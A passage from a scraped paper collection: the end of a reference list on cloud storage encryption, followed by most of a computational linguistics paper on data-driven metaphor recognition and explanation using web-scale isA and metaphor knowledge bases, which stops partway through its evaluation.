Inf. Syst. Secur. (TISSEC)9, 1–30 (2006) [25] Zhang, Yuan; Xu, Chunxiang; Li, Hongwei; Liang, Xiaohui: Cryptographic Public Verification of Data Integrity for Cloud Storage Systems. IEEE Cloud Computing, v3, n5, p 44-52, 2016 [26] Emura, K., Miyaji, A., Nomura, A., Omote, K., Soshi, M.: Aciphertext-policy attribute-based encryption scheme withconstant ciphertext length. Inf. Secur. Practice Experience5451, 13–23 (2009) [27] Purushothama, B.R; Shrinath, B.; Amberker, B.B. : Secure cloud storage service and limited proxy re-encryption for enforcing accesscontrol in public cloud. International Journal of Information and Communication Technology, v5, n2, p167-186, 2013 [28] Cui, Yihui; Peng, Zhiyong; Song, Wei; Li, Xiaojuan; Cheng, Fangquan; Ding, Luxiao: A time-based group key management algorithm based on proxy re-encryption for cloudstorage. Lecture Notes in Computer Science (including subseries Lecture Notes in Artificial Intelligence and LectureNotes in Bioinformatics), v8709 LNCS, p117-128, 2014 [29] Shao, Jun; Lu, Rongxing; Lin, Xiaodong; Liang, Kaitai: Secure bidirectional proxy re-encryption for cryptographic cloud storage. Pervasive and Mobile Computing, v28, p113-121, June 1, 2016 [30] Jiang, Linmei; Guo, Donghui: Dynamic Encrypted Data Sharing Scheme Based on Conditional Proxy Broadcast Re-Encryption for Cloud Storage. IEEE Access, v5, p13336-13345, July 13, 2017 [31] Wang, XuAn; Xhafa, Fatos; Hao, Wei; He, Wei: Non-transferable unidirectional proxy re-encryption scheme for secure social cloudstorage sharing. Proceedings - 2016 International Conference on Intelligent Networking and Collaborative Systems, IEEE INCoS 2016, p328-331, October 25, 2016 work_3iywiieamja5tayrhj5mjsm6gy ---- Data-Driven Metaphor Recognition and Explanation Data-Driven Metaphor Recognition and Explanation Hongsong Li Microsoft Research Asia hongsli@microsoft.com Kenny Q. Zhu Shanghai Jiao Tong University kzhu@cs.sjtu.edu.cn Haixun Wang Google Research haixun@google.com Abstract Recognizing metaphors and identifying the source-target mappings is an important task as metaphorical text poses a big challenge for machine reading. To address this problem, we automatically acquire a metaphor knowledge base and an isA knowledge base from billions of web pages. Using the knowledge bases, we develop an inference mechanism to rec- ognize and explain the metaphors in the text. To our knowledge, this is the first purely data- driven approach of probabilistic metaphor ac- quisition, recognition, and explanation. Our results shows that it significantly outperforms other state-of-the-art methods in recognizing and explaining metaphors. 1 Introduction A metaphor is a way of communicating. It enables us to comprehend one thing in terms of another. For example, the metaphor, Juliet is the sun, allows us to see Juliet much more vividly than if Shakespeare had taken a more literal approach. We utter about one metaphor for every ten to twenty-five words, or about six metaphors a minute (Geary, 2011). Specifically, a metaphor is a mapping of concepts from a source domain to a target domain (Lakoff and Johnson, 1980). The source domain is often con- crete and based on sensory experience, while tar- get domain is usually abstract. Two concepts are connected by this mapping because they share some common or similar properties, and as a result, the meaning of one concept can be transferred to an- other. For example, in “Juliet is the sun,” the sun is the source concept while Juliet is the target concept. One interpretation of this metaphor is that both con- cepts share the property that their existence brings about warmth, life, and excitement. In a metaphor- ical sentence, at least one of the two concepts must be explicitly present. This leads to three types of metaphors: 1. Juliet is the sun. Here, both the source (sun) and the target (Juliet) are explicit. 2. Please wash your claws before scratching me. Here, the source (claws) is explicit, while the target (hands) is implicit, and the context of wash is in terms of the target. 3. Your words cut deep. Here, the target (words) is explicit, while the source (possibly, knife) is implicit, and the context of cut is in terms of the source. In this paper, we focus on the recognition and ex- planation of metaphors. For a given sentence, we first check whether it contains a metaphoric expres- sion (which we call metaphor recognition), and if it does, we identify the source and the target con- cepts of the metaphor (which we call metaphor ex- planation). Metaphor explanation is important for understanding metaphors. Explaining type 2 and 3 metaphors is particularly challenging, and, to the best of our knowledge, has not been attempted for nominal concepts 1 before. In our examples, know- ing that life and hands are the target concepts avoids the confusion that may arise if source concepts sun and claws are used literally in understanding the sen- tences. This, however, does not mean that the source 1Nominal concepts are those represented by noun phrases. 379 Transactions of the Association for Computational Linguistics, 1 (2013) 379–390. Action Editor: Lillian Lee. Submitted 6/2013; Revised 9/2013; Published 10/2013. c©2013 Association for Computational Linguistics. concept is a useless embellishment. In the 3rd sen- tence, knowing that words is mapped to knife en- ables the system to understand the emotion or the sentiment embedded in the text. This is the reason why metaphor recognition and explanation is impor- tant to applications such as affection mining (Smith et al., 2007). It is worth noting that some prefer to consider the verb “cut”, rather than the noun “words”, to be metaphoric in the 3rd sentence above. We instead concentrate on nominal metaphors and seek to ex- plain source-target mappings in which at least one domain is a nominal concept. This is because verbs usually have nominal arguments, as either subject or object, thus explaining the source-target mapping of the nominal argument covers most, if not all, cases where a verb is metaphoric. In order for machines to recognize and explain metaphors, it must have extensive human knowl- edge. It is not difficult to see why metaphor recog- nition based on simple context modeling (e.g., by selectional restriction/preference (Resnik, 1993)) is insufficient. First, not all expressions that violate the restriction are metaphors. For example, I hate to read Heidegger violates selectional restriction, as the context (embodied by the verb read) prefers an object other than a person (Heidegger). But, Heideg- ger is not a metaphor but a metonymy, which in this case denotes Heidegger’s books. Second, not every metaphor violates the restriction. For example, life is a journey is clearly a metaphor, but selectional re- striction or preference is helpless when it comes to the isA context. Existing approaches based on human-curated knowledge bases fall short of the challenge. First, the scale of a human-curated knowledge base is of- ten very limited, which means at best it covers a small set of metaphors. Second, new metaphors are created all the time and the challenge is to rec- ognize and understand metaphors that have never been seen before. This requires extensive knowl- edge. As a very simple example, even if the machine knows Sports cars are fire engines is a metaphor, it still needs to know what is a sports car before it can understand My Ferrari is a fire engine is also a metaphor. Third, existing human-curated knowl- edge bases (including metaphor databases and the WordNet) are not probabilistic. They cannot tell how typical an instance is of a category (e.g., a robin is a more typical bird than a penguin), or how popu- lar an expression (e.g., a breath of fresh air) is used as a source concept to describe targets in another concept (e.g., young girls). Unfortunately, without necessary probabilistic information, not much rea- soning can be performed for metaphor explanation. In this paper, we address the above challenges. We start with a probabilistic isA knowledge base of many entities and categories harnessed from billions of web documents using a set of strict syntactic pat- terns known as the Hearst patterns (Hearst, 1992). We then automatically acquire a large probabilistic metaphor database with the help of both syntactic patterns and the isA knowledge base (Section 3). Finally we combine the two knowledge bases and a probabilistic reasoning mechanism for automatic metaphor recognition and explanation (Section 4). This paper makes the following contributions: 1. To our knowledge, we are the first to intro- duce the metaphor explanation problem, which seeks to recover missing or implied source or target concepts in an implicit metaphor. 2. This is the first big-data driven, unsupervised approach for metaphor recognition and expla- nation. One of the benefits of leveraging big data is that the knowledge we obtain is less bi- ased, has great coverage, and can be updated in a timely manner. More importantly, a data driven approach can associate with each piece of knowledge probabilities which are not avail- able in human curated knowledge but are indis- pensable for inference and reasoning. 3. Our results show the effectiveness both in terms of coverage and accuracy of our approach. We manage to acquire one of the largest metaphor knowledge bases ever existed with a preci- sion of 82%. The metaphor recognition accu- racy significantly outperforms the state-of-the- art methods (Section 5). 2 Related Work Existing work on metaphor recognition and interpre- tation can be divided into two categories: context- oriented and knowledge-driven. The approach pro- posed in this paper touches on both categories. 380 2.1 Context-oriented Methods Some previous work relies on context to differentiate metaphorical expressions from literal ones (Wilks, 1978; Resnik, 1993). The selection restriction the- ory (Wilks, 1978) argues that the meaning of an ex- pression is restricted by its context, and violations of the restriction imply a metaphor. Resnik (1993) uses KL divergence to measure the selectional preference strength (SPS), i.e., how strongly a context restricts an expression. Although he did not use this measure directly for metaphor recognition, SPS (and also a related measure called the selection association) is widely used in more re- cent approaches for metaphor recognition and inter- pretation (Mason, 2004; Shutova, 2010; Shutova et al., 2010; Baumer et al., 2010). For example, Ma- son (2004) learns domain-specific selectional prefer- ences and use them to find mappings between con- cepts from different domains. Shutova (2010) de- fines metaphor interpretation as a paraphrasing task. The method discriminates between literal and fig- urative paraphrases by detecting selectional prefer- ence violation. The result of this work has been compared with our approach in Section 5. Shutova et al. (2010) identify concepts in a source domain of a metaphor by clustering verb phrases and filter- ing out verbs that have weak selectional preference strength. Baumer (2010) uses semantic role labeling techniques to calculate selectional preference on se- mantic relations instead of grammatic relations for metaphor recognition. A less related but also context-based work is analogy interpretation by relation mapping (Turney, 2008). The problem is to generate mapping between source and target domains by computing pair-wise co-occurrences for different contextual patterns. Our approach uses selectional restriction when enriching the metaphor knowledge base, and adopts context preference when explaining type 2 and 3 metaphors by focusing on the nearby verbs of a po- tential source or target concept. 2.2 Knowledge-driven Methods A growing number of works use knowledge bases for metaphor understanding (Martin, 1990; Narayanan, 1997; Barnden et al., 2002; Veale and Hao, 2008). MIDAS (Martin, 1990) checks if a sen- tence contains an expression that can be explained by a more general metaphor in a human-curated metaphor knowledge base. ATT-Meta (Barnden et al., 2002) performs metaphor reasoning with a human-curated metaphor knowledge base and first order logic, and it focuses on affection detection (Smith et al., 2007; Agerri, 2008; Zhang, 2010). Kr- ishnakumaran and Zhu (2007) use the isA relation in WordNet (Miller, 1995) for metaphor recognition. Gedigian et al. (2006) use FrameNet (Fillmore et al., 2003) and Probank (Kingsbury and Palmer, 2002) to train a maximum entropy classifier for metaphor recognition. TroFi (Birke and Sarkar, 2006) rede- fines literal and non-literal as two senses of the same verb and provide two senses with seed sentences from human-curated knowledge bases like Word- Net, known metaphor and idiom sets. For a given sentence containing target verb, it compares the sim- ilarity of the sentence with two seed sets respec- tively. If the sentence is closer to the non-literal sense set, the verb is recognized as non-literal usage. While the above work all relies on human cu- rated data sets or manual labeling, Veale and Hao (2008) introduced the notion of talking points which are figurative properties of noun-based concepts. For example, the concept “Hamas” has the follow- ing talking points: is islamic:movement and gov- erns:gaza strip. They automatically constructed a knowledge base called Slip Net from WordNet and Web corpus. Concepts that are connected on the Slip Net can “slip” to one another and are hence considered related in a metaphor. However, straight- forward traversal on the Slip Net can become com- putationally impractical and the authors did not elab- orate on the implementation details. In practice, the knowledge acquired in this paper is much larger but our algorithms are computationally more feasible. 3 Obtaining Probabilistic Knowledge In this section, we describe how to use a large, general-purpose, probabilistic isA knowledge base ΓH to create a probabilistic metaphor dataset Γm. ΓH contains isA pairs as well as scores associated with each pair. The metaphor dataset Γm contains metaphors of the form: (source, target), and a weight function Pm that maps a metaphor pair to a probabilistic score. The purpose of creating ΓH is 381 to help clean and expand Γm, and to perform proba- bilistic inference for metaphor detection. 3.1 IsA Knowledge ΓH ΓH , a general-purpose, probabilistic isA knowl- edge base, was previously constructed by Wu et al.(2012).2 ΓH contains isA relations in the form of (x,hx), a pair of hyponym and hypernym, for exam- ple, (Steve Ballmer, CEO of IT companies), and each pair is associated with a set of probabilistic scores. Two of the most important scores are known as typ- icality: P(x|hx), the typicality of x of category hx, and P(hx|x), the typicality of category hx for in- stance x, which will be used in metaphor recogni- tion and explanation. Both scores are approximated by frequencies, e.g., P(x|hx) = # of (x,hx) in Hearst extraction # of hx in Hearst extraction In total, ΓH contains 16 million unique isA rela- tionships, and 2.7 million unique concepts or cate- gories (the hx’s in (x,hx) pairs). The importance of big data is obvious. ΓH contains millions of cat- egories and probabilistic scores for each category which enables inference for metaphor understand- ing, as we will show next. 3.2 Acquiring Metaphors Γm We acquire an initial set of metaphors Γm from sim- iles. A simile is a figure of speech that explicitly compares two different things using words such as “like” and “as”. For example, the sentence Life is like a journey is a simile. Without the word “like,” it becomes a metaphor: Life is a journey. This property makes simile an attractive first target for metaphor extraction from a large corpus. We use the following syntactic pattern for extraction: 〈target〉 BE/VB like [a] 〈source〉 (1) where BE denotes is/are/has been/have been, etc., VB denotes verb other than BE, and 〈target〉 and 〈source〉 denote noun phrases or verb phrases. Note that not every extracted pair is a metaphor. Poetry is like an art matches the pattern, but it is not a metaphor because poetry is really an art. We will use ΓH to clean such pairs. Furthermore, due to the 2Dataset can be found at http://probase.msra.cn/. idiosyncrasies of natural languages, it is not trivial to correctly extract the 〈target〉 and the 〈source〉 from each sentence that matches the pattern. We use a postagger and a lemmatizer on the sentences, and we develop a rule-based system that contains more than two dozen rules for extraction. For example, a rule of high-precision but low-recall is “〈target〉 must be at the beginning of a sentence or the beginning of a clause (e.g., following the word that)”. Finally, from 8,552,672 sentences that match the above pattern (pattern 1), we obtain 1.2 million unique (x,y) pairs, and after filtering, we are left with close to 1 million unique metaphor pairs, which form the starting point of Γm. 3.3 Cleaning, Expanding, and Weighting Γm The simile pattern only allows us to extract some of the available metaphor pairs. To expand Γm, we use a more flexible but also noisier pattern to extract more candidate metaphor pairs from billions of sen- tences in the web corpus: 〈target〉 BE [a] 〈source〉 (2) The above “is a” pattern covers metaphors such as Life is a journey. But many pairs thus extracted are not metaphors, for example, Malaysia is a tropical country. That is, pairs extracted by the “is a” pat- tern contains at least two types of relations: the lit- eral isA relations and the metaphor relations. The problem is how to distinguish one from the other. In theory, the set of all IsA relations, I, and the set of all metaphor relations, M, do not overlap, because by definition, the source concept and the target con- cept in a metaphor are not the same thing. Thus, our intuition is the following. The pairs produced by the simile pattern, called S, is a subset of M, while the pairs extracted from the Hearst pattern, called H, is also a subset of I. Since M and I hardly overlap, S and H should have little overlap, too. In practice, very few people would say something like journeys such as life. Figure 1 illustrates this scenario. To verify this intuition, we randomly sampled 1,000 sentences and manually annotated them. Of these sentences, 40 contain an IsA relation, of which 27 are enclosed in a Hearst’s pattern and 13 can be extracted by the “is a” pattern. Furthermore, 28 of these 1000 sentences contain a metaphor expression, 382 (beast, sports car)(sports car, ferrari) (vehicle, ferrari) (beast, ferrari) Hearst pattern Is-a relation Simile pattern Metaphor relation “Is a” pattern Figure 1: Relations among different sets. Dotted circles represent relations (ground truth). Solid circles represent pairs extracted by syntactic patterns. and within the 28 metaphors, 15 are embedded in a simile pattern. More importantly, there is no overlap between the IsA relations and metaphors (and hence the similes). In a larger scale experiment, we crawled 1 billion sentences which match the “is a” pattern (2) from the web corpus. From these, we extracted 180 million unique (x,y) pairs. 24.8% of ΓH can be found in “is a” pattern pairs, while 16.8% of Γm can be found in “is a” pattern pairs. Further more, there is almost no overlap between ΓH and Γm: 1.26% of ΓH can be found in Γm, and 1.31% of Γm can be found in ΓH . Our goal is to use the information collected through the syntactic patterns to enrich the metaphor relations or Γm. Armed with the above observations, we make two conclusions. First, the (life, journey) pair we extracted from life is a journey is more likely a metaphor since it does not appear in the set ex- tracted from Hearst patterns. Second, if any existing pair in Γm also appears in ΓH , we can remove that pair from Γm. From the 180 million unique (x,y) pairs we ex- tracted earlier, by filtering out low frequency pairs 3 and those pairs in ΓH , we obtain 2.6 million of fresh metaphors. This is almost 3 times larger than initial metaphor set obtained from the simile pattern. We further expand Γm by adding metaphors derived from Γm and ΓH . Assume (x,y) ∈ Γm, and (x,hx) ∈ ΓH , then we add (hx,y) to Γm. As an example, if (Julie,sun) ∈ Γm, 3Specifically, we randomly sample pairs of frequency 1, 2, ..., 10 from Γm and check the precisions of each group. We filter out pairs with frequency less than 5 to optimize the precision. then we add (person name,sun) to Γm, since (Julie,person name) ∈ ΓH . This enables the metaphor detection approach we describe in Section 4. Note that we ignore transitivity in the isa relations from ΓH as such transitivity is not always reliable. For example, car seat is a chair, and chair is furni- ture, but car seat is not furniture. How to handle transitivity in a data driven isA taxonomy is a chal- lenging problem, and is beyond the scope here. Finally, we calculate the weight of each metaphor (x,y). The weight Pm(x,y) is calculated as follows: Pm(x,y) = occurrences of (x,y) in isA pattern occurrences of isA pattern (3) The weights of derived metaphors, such as (person name,sun), are calculated as follows: Pm(hx,y) = ∑ (x,hx)∈ΓH Pm(x,y) (4) 4 Probabilistic Metaphor Understanding In this paper, we consider two aspects of metaphor understanding, metaphor recognition and metaphor explanation. The latter is needed for type 2 and 3 metaphors where either the source or the target con- cept is implicit or missing. Next, we describe a prob- abilistic approach to accomplish these two tasks. 4.1 Type 1 Metaphors In a type 1 metaphor, both the source and the tar- get concepts appear explicitly. When a sentence matches “is a” pattern (pattern 2), it is a potential metaphor expression. The first noun in the pattern is the target candidate, while the second noun is the source candidate. To recognize type 1 metaphors, we first obtain the candidate (source, target) pair from the sentence. Then, we check if we have any knowledge about the (source, target) pair. Intuitively, if the pair exists in the metaphor dataset Γm, then it is a metaphor. If the pair ex- ists in the is-A knowledge base ΓH , then it is not a metaphor. But because Γm is far from being com- plete, if a pair exists in neither Γm nor ΓH , there is a possibility that it is a metaphor we have never seen before. In this case, we reason as follows. Consider a sentence such as My Ferrari is a beast. Assume (Ferrari, beast) 6∈ Γm, but (sports car, 383 beast) ∈ Γm. Note that (sports car, beast) may it- self be a derived metaphor which is added into Γm in metaphor expansion, and the original metaphor ex- tracted from the web data is (Lamborghinis, beast). Furthermore, from ΓH , we know Ferrari is a sports car, that is, (Ferrari, sports car) ∈ ΓH , we can then infer that Ferrari to beast is very likely a metaphor mapping. Specifically, let (x,y) be a pair we are concerned with. We want to compute the odds of (x,y) repre- senting a metaphor vs. a normal is-A relationship: P(x,y) 1 −P(x,y) (5) where P(x,y) is the probability that (x,y) forms a metaphor. Now, combining the knowledge we have in ΓH , we have P(x,y) = ∑ (x,hx)∈ΓH P(x,hx,y) (6) Here, hx is a possible superconcept, i.e., a possible interpretation, for x. For example, if x = apple, then two highly possible interpretations are com- pany and fruit. In Eq.(6), we want to aggregate on all possible interpretations (all superconcepts) of x. This is possible because of the massive size of the concept space in ΓH . We can rewrite Eq.(6) to the following: P(x,y) = ∑ (x,hx)∈ΓH P(y|x,hx)P(x|hx)P(hx) (7) Here, P(y|x,hx) means when x is interpreted as an hx, the probability of y as a target metaphorical con- cept for hx. Thus, given hx, y is independent with x, so P(y|x,hx) can be simply replaced by P(y|hx). We can then rewrite Eq.(7) to: P(x,y) = ∑ (x,hx)∈ΓH P(y|hx)P(x|hx)P(hx) = ∑ (x,hx)∈ΓH P(hx,y)P(x|hx) (8) It is clear P(hx,y) is simply Pm(hx,y) in Eq.(4) given by the metaphor dataset Γm. Furthermore, P(x|hx) is the typicality of x in the hx category, and P(hx) is the prior of the category hx. Both of them are available from the isA knowledge base ΓH . Thus, we can calculate Eq.(8) using information in the two knowledge bases we have created. If the odds in Eq.(5) is greater than a thresh- old δ, which is determined empirically to be δ = P (metaphor) P (isa) 4, we declare (x,y) as a metaphor. 4.2 Context Preference Modeling It is more difficult to recognize metaphors when the source concept or the target concept is not explic- itly given in a sentence. In this case, we rely on the context in the sentence. Given a sentence, we find metaphor candidates and the context. Here, candidates are noun phrases in the sentence which can potentially be the target or the source concept of a metaphor, while context denotes words that have a grammatic dependency with the candidate. The dependency can be subject- predicate, predicate-object, or modifier-header, etc. The context can be a verb, a noun phrase, or an ad- jective which has certain preference over the target or source candidate. For example, the word horse prefers verbs such as jump, drink and eat; the word flower prefers modifiers such as red, yellow and beautiful. In this work, we focus on analyzing the prefer- ences of verbs using subject-predicate or predicate- object relation between the verb and the noun phrases. We select 2,226 most frequent verbs from the web corpus. For each verb, we construct the dis- tribution of noun phrases depend on the verb in the sentences sampled from the web corpus. The noun phrases are restricted to be those that occur in ΓH . More specifically, for any noun phrase y that ap- pears in ΓH , we calculate the following Pr(C|y) = fr(y,C)∑ C fr(y,C) (9) where fr(y,C) means the frequency of y and con- text C with relation r. Note we can build prefer- ence distribution for context other than verbs since, in theory, r can be any relation (e.g. modifier-head relation). 4.3 Type 2 and Type 3 Metaphors If a sentence contains type 2 and type 3 metaphors, either the source or the target concepts in the sen- 4This is the ratio between the number of metaphors and is-a pairs in a random sample of “is a” pattern sentences. 384 tence is missing. For each noun phrase x and a con- text C in such a sentence, we want to know whether x is of literal or metaphoric use. It is a metaphoric use if the selectional preference of some y, which is a source or target concept of x in Γm, is larger than the selectional preference of any super-concept of x in ΓH , by a factor δ. Formally, there exists a y where (x,y) ∈ Γm or (y,x) ∈ Γm, such that P(y|x,C) P(h|x,C) ≥ δ, ∀(x,h) ∈ ΓH. (10) To compute (10), we have P(y|x,C) = P(x,y,C) P(x,C) = P(x,y)P(C|x,y) P(x,C) (11) Assuming x is a target concept and y is a source concept (a Type 3 metaphor), we can obtain P(x,y) by Eq.(8). 5 Furthermore, C is independent of x in a type 2 or 3 metaphor, since a metaphor is an unusual use of x (the target) within a given context. Therefore P(C|x,y) = P(C|y), where P(C|y) is available from Eq. (9). Similarly, we have P(h|x,C) = P(x,h)P(C|h) P(x,C) (12) where P(x,h) is obtained from ΓH and P(C|h) is from the context preference distribution. To explain the metaphor, or uncover the missing concept, y∗ = arg max y ∧ (y,x)∈Γm P(y|x,C) = arg max y ∧ (y,x)∈Γm P(y,x)P(C|y) As a concrete example, consider sentence My car drinks gasoline. There are two possible targets: car and gasoline. The context for both targets is the verb drink. Let x = car. By Eq.(11), we first find all y’s for which (car,y) ∈ Γm or (y,car) ∈ Γm. We get terms such as woman, friend, gun, horse, etc. When we calculate P(car,y) by Eq.(8), we also need to find hypernyms of car in ΓH , which 5Type 2 metaphors can be handled similarly. may include vehicle, product, asset, etc. For each candidate y, P(y|car,C) is calculated by metaphor knowledge P(x,y) and context preference P(C|yi). Table 1 shows the result. Since the selectional pref- erence of horse (from Γm) is much larger than other literal uses of car, this sentence is recognized as a metaphor, and the missing source concept is horse. Table 1: Log probabilities (M: Metaphor, L:Literal). Type yi log log log P(yi P(yi,car) P(C|yi) |car,C) L vehicle -6.2 -∞ -∞ L product -6.9 -∞ -∞ L asset -6.3 -∞ -∞ M woman -8.5 -2.8 -11.3 M friend -8.0 -3.0 -11.0 M gun -8.4 -∞ -∞ M horse -8.2 -2.4 -10.6 ... ... ... ... ... 5 Experimental Result We evaluate the performance of metaphor acquisi- tion, recognition and explanation in our system and compare it with several state-of-the-art mechanisms. 5.1 Metaphor Acquisition From the web corpus, we collected 8,552,672 sen- tences matching the “is like a” pattern (pattern 1) and we extracted 932,621 unique high quality sim- ile mappings from them. These simile mappings became the core of Γm. ΓH contains 16,736,068 unique isA pairs. We also collected 1,131,805,382 sentences matching the “is a” pattern (pattern 2), from which 180,446,190 unique mappings were ex- tracted. These mappings contain both metaphors and isA relations. From there, we identified 2,663,127 pairs of metaphors unseen in the sim- ile set. These new metaphor pairs were added to Γm. Random samples show that the precisions of the core metaphor dataset and the whole dataset are 93.5% and 82%, respectively. All of the above datasets, a sample of context preference, as well as the test sets mentioned in this section can be found at http://adapt.seiee.sjtu.edu. cn/˜kzhu/metaphor. 385 5.2 Type 1 Metaphor Recognition We compare our type 1 metaphor recognition with the method (known as KZ) by Krishnakumaran and Zhu (2007). For sentences containing “x is a y” pat- tern, KZ used WordNet to detect whether y is a hy- pernym of x. If not, then this sentence is considered a metaphor. Our test set is 200 random sentences that match the “x BE a y” pattern. We label a sen- tence in the set as a metaphor if the two nouns con- nected by BE do not actually have isA relation; or if they do have isA relation but the sentence expressed a strong emotion 6. Table 2: Type 1 metaphor recognition Precision Recall F1 KZ 13% 30% 18% Our Approach 73% 66% 69% The result is summarized in Table 2. KZ does not perform as well due to the small coverage of Word- Net taxonomy. Only 33 out of 200 sentences con- tain a concept x that exists in WordNet and has at least one hypernym. And among these, only 2 sen- tences contain a y which is the hypernym ancestor of x in WordNet. Clearly, the bottleneck is the scale of WordNet. 5.3 Type 2/3 Metaphor Recognition For type 2/3 metaphor recognition, we compare our results with three other methods. The first compet- ing method (called SA) employs the selectional as- sociation proposed by Resnik (1993). Selectional association measures the strength of the connection between a predicate (c) and a term (e) by: A(c,e) = Pr(e|c) log Pr(e|c) Pr(e) S(c) , (13) where S(c) = KL(Pr(e|c)||Pr(e)) = ∑ e Pr(e|c) log Pr(e|c) Pr(e) Given an NP-predicate pair, if its SA score is less than a threshold α (set to 10−4 by empirics), then the pair is recognized as a metaphor context. 6For example, “this man is an animal!”. Second competing method (called CP) is the con- textual preference approach (Resnik, 1993) intro- duced in Section 4.2. To establish context prefer- ence distributions, we randomly select 100 million sentences from the web corpus, parse each sentence using Stanford parser (Group, 2013) to obtain all subject-predicate-object triples, and aggregate the triples to get 33,236,292 subject-predicate pairs and 38,890,877 predicate-object pairs. The occurrences of these pairs are used as context preference. Given a pair of NP-predicate pair, if its context preference score is less than a threshold β (set to 10−5 by em- pirics 7), then the pair is considered as metaphoric. The third competing method (called VH) is a vari- ant of our own algorithm with Γm replaced by a metaphor database derived from the Slip Net pro- posed by Veale and Hao (2008), which we call ΓV H . We built a Slip Net containing 21,451 concept nodes associated with 27,533 distinct talking points. We consider two concepts to be metaphoric if they are at most 5 hops apart on the Slip Net The choice of 5 hops is a trade-off between precision and recall for Slip Net. We thus created ΓV H with 5,633,760 pairs of concepts. We sampled 1,000 sentences from the BNC dataset (Clear, 1993) as follows. We prepare a list of 2,945 frequent verbs (and their different forms). For each verb, we obtain at most 5 sentences from BNC dataset which contain this verb as a predicate. At this point, we obtain a total of 22,601 sentences and randomly sample 1,000 sentences to form a test set. Each sentence in the set is then manually la- beled as being “metaphor” or “non-metaphor”. We label them according to this procedure: 1. for each verb, we collect the intended use, i.e., the categories of its arguments (subject or ob- ject) according to Marriam Webster’s dictio- nary; 2. if the argument of the verb in the sentence be- longs to the intended category, the sentence is labeled “non-metaphor”; 3. if the argument and the intended meaning form a metonymy which uses a part or an attribute to 7The authors didn’t specify the choice of α and β, and we pick values which optimize the performance of their algorithms. 386 represent the whole object, the pair is labeled as “non-metaphor”; 4. else the sentence is labeled as “metaphor”. Table 3: Type 2/3 metaphor recognition Precision Recall F1 SA 23% 20% 21% CP 50% 20% 26% VH 11% 86% 20% Our Approach 65% 52% 58% The results for type 2 and 3 metaphor recogni- tion are shown in Table 3. Our knowledge-based ap- proach significantly outperforms the other peers by F-1 measure. Although VH achieves a good recall, its precision is poor. This is because i) Slip Net con- struction makes heavy use of sibling terms on the WordNet but sibling terms are not necessarily simi- lar terms; ii) many pairs generated by slipping over the Slip Net are in theory related but are not com- monly uttered due to the lack of practical context. 0% 10% 20% 30% 40% 50% 60% 70% 80% SPS (2,3] SPS (3,4] SPS (4,5] F 1 s c o re SPS of verbs SA CP VH Our approach Figure 2: Metaphor recognition of type 2 and 3 Fig. 2 compares the four methods on verbs with different selectional preference strength, which indi- cates how strong a verb’s arguments are restricted to a certain scope of nouns.8 Again, our method shows a significant advantage across the board. We explain why our approach works better us- ing the examples in Table 4. In sentence AAU200, shatters is a metaphoric usage because silence is not a thing that can be broken into pieces. SA and CP scores for shatters-silence pair are high because this word combination is quite common, 8Note that no verb has SPS larger than 5. and hence these methods incorrectly treat it as lit- eral expression. The situation is similar with stalk- company pair in ABG2327. On the other hand, for AN81309, manipulate-life is considered rare com- bination and hence has low SA and CP scores and is deemed a metaphor while in reality it is a literal use. A similar case occurs for work-concur pair. In all these cases, our knowledge bases Γm and ΓH are comprehensive and accurate enough to correctly identify metaphors vs. non-metaphors. On the con- trary, the metaphor database ΓV H covers way too many pairs that it treats every pair as a metaphor. Besides our own dataset, we also experiment on TroFi Example Base9, which consists of 50 verbs and 3,736 sentences containing these verbs. Each sentence is annotated as literal and nonliteral use of the verb. Our algorithm is used to classify the sub- jects and the objects of the verbs. We use Stanford dependency parser to obtain collapsed typed depen- dencies of these sentences, and for each sentence, run our algorithm to classify the subjects and objects related to the verb, if the verb acts as a predicate. Results show that our approach achieves 77.5% pre- cision but just under 5% in recall. The low recall is because, i) non-literal uses in the TroFi dataset in- clude not only metaphor but also metonymy, irony and other anomalies; ii) our approach currently fo- cuses on subject-predicate and predicate-object de- pendencies in a sentence only, but the target verbs do not act as predicate in many of the example sen- tences; iii) the Stanford dependency parser is not ro- bust enough so half of the sentences are not parsed correctly. 5.4 Metaphor Explanation In this experiment, we use the classic labeled metaphoric sentences from (Lakoff and Johnson, 1980). Lakoff provided 24 metaphoric mappings, and for each mapping there are about ten example sentences. In total, there are 214 metaphoric sen- tences. Among them, we focus on 83 sentences whose metaphor is expressed by subject-predicate or predicate-object relation, as this paper focuses on verb centric context preferences. We evaluate the results of competing algorithms 9TroFi Example Base is available at http://www.cs. sfu.ca/˜anoop/students/jbirke/. 387 Table 4: Metaphor recognition for some example sentences from BNC dataset (HM: Human, M: Metaphor, L : Literal). ID Sentence HM SA CP VH Ours AAU 200 Road-block salvo shatters Bucharest’s fragile silence. M L L M M ABG 2327 Obstruction and protectionism do not stalk only big companies. M L L M M AN8 1309 But when science proposes to manipulate the life of a human baby, L M M M L ACH 1075 Nevertheless, recent work on Mosley and the BUF has concurred L M M M L about their basic unimportance. by the following labeling criteria. We consider an output (i.e. a pair of concept mapping) as a match, if the produced pair exactly matches the ground truth pair, of if the pair is subsumed by the ground truth pair. For example, the ground truth for the sentence Let that idea simmer on the back burner is ideas → foods according to Lakoff (Lakoff and Johnson, 1980). If our algorithm outputs idea → stew, then it is considered a match since stew belongs to the food category. An output pair is considered correct if it is not a match to the ground truth but is otherwise considered metaphoric by at least 2 of the 3 human judges. Given a sentence, since our algorithm returns a list of possible explanations for the missing concept, ranked by the probability, we evaluate the results by three different metrics: Match Top 1: result considered correct if there is a match with the top explanation; Match Top 3: result considered correct if there is a match in the top 3 ranked explanations; Correct Top 3: result considered correct if there is a correct in the top 3 explanations. Table 5: Precision of metaphor explanation using differen metaphor databases Match Top 1 Match Top 3 Correct Top 3 ΓV H 26% 49% 54% Γm 43% 67% 78% Comparison with Slip Net We compare the result of our algorithm (from Section 4.3) against the variant which uses ΓV H ob- tained in Section 5.3. Table 5 summarizes the precisions of the two al- gorithms under three different metrics. Some of these sentences and the top explanations given by our algorithm are listed in Table 6. The concept to be explained is italicized while the explanation that is a match or correct is bolded or bold-italicized, re- spectively. The explanations are ordered from left to right by the score. Comparison with paraphrasing While we define metaphor explanation as a task to recover the missing noun-based concept in a source-target mapping, an alternative way to explain a metaphor (Shutova, 2010) is to find the paraphrase of the verb in the metaphor. Here we evaluate para- phrasing task on verbs in metaphoric sentence by Shutova et al(Shutova, 2010). For a metaphoric verb V in a sentence, Shutova et al. select a set of verbs that probabilistically best matches grammar relations of V , and then filter out those verbs that are not related to V according to the WordNet, and eventually re-rank remaining verbs based on selec- tion association. In some sense, Shutova’s work uses a similar framework as ours: first restrict the target para- phrasing set using a knowledge, then select the most proper word based on the context. The difference is that 